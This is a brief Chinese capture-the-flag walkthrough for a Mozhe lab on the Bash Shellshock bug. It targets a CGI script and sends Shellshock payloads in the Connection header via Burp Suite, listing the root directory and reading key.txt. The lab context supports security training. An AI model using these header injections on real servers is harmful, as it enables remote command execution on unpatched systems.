墨者Bash漏洞分析溯源

a1b83357eff3d2f4.png

打开题目环境

d757cdab77934805.png

Bash漏洞存在的路径多数在网页/cgi-bin/下,打开此网页。

1
http://url/cgi-bin/poc.cgi

1040a34a9011bd9d.png

此漏洞是存在的,使用bp抓包

把在下面的Connection的参数,改成我们的执行代码。

1
Connection: () { :;}; echo; /bin/ls /

5f9360e8c55d589c.png

继续执行我们的命令 看key.txt

1
Connection: () { :;}; echo; /bin/cat /key.txt

34c32de1d8d9192c.png

问题解决